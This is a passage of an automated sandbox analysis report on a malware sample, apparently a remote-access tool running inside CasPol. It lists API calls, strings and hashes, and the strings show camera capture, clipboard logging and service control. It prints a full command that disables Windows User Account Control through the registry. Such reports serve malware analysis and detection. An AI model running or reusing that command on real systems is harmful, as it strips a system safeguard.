                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                            • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                            Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe
                                                                                                            • String ID:
                                                                                                            • API String ID: 4189289331-0
                                                                                                            • Opcode ID: dd2f1bd308eb93d0c4e5b61de7cd89d13f43cbfcc6682a20ed2fda671c880afe
                                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                            • Opcode Fuzzy Hash: dd2f1bd308eb93d0c4e5b61de7cd89d13f43cbfcc6682a20ed2fda671c880afe
                                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                            Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                            • Opcode ID: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                            • Opcode Fuzzy Hash: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                            Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologSleep
                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                            • API String ID: 3469354165-462540288
                                                                                                            • Opcode ID: a88306c6b6b22483e33f2cfd5532959f9b9ab3ef250dc344f137d7fc927df87a
                                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                            • Opcode Fuzzy Hash: a88306c6b6b22483e33f2cfd5532959f9b9ab3ef250dc344f137d7fc927df87a
                                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                            Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 493672254-0
                                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                            Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                            • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                            Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                            • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                            Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                            • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                            Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                            • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                            Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                            • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                            Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                            • String ID: [regsplt]$DG
                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                            • Opcode ID: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                            • Opcode Fuzzy Hash: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                            Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                            • API String ID: 2974294136-753205382
                                                                                                            • Opcode ID: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                            • Opcode Fuzzy Hash: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                            Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                            Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                            Strings
                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                            Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                            Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: pth_unenc$BG
                                                                                                            • API String ID: 1818849710-2233081382
                                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                            Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                            • SetEvent.KERNEL32(?), ref: 00404AF9
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404B04
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00404B0D
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                            • API String ID: 2993684571-305739064
                                                                                                            • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                            • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                            Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                            • String ID: Alarm triggered
                                                                                                            • API String ID: 614609389-2816303416
                                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                            Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                            Strings
                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
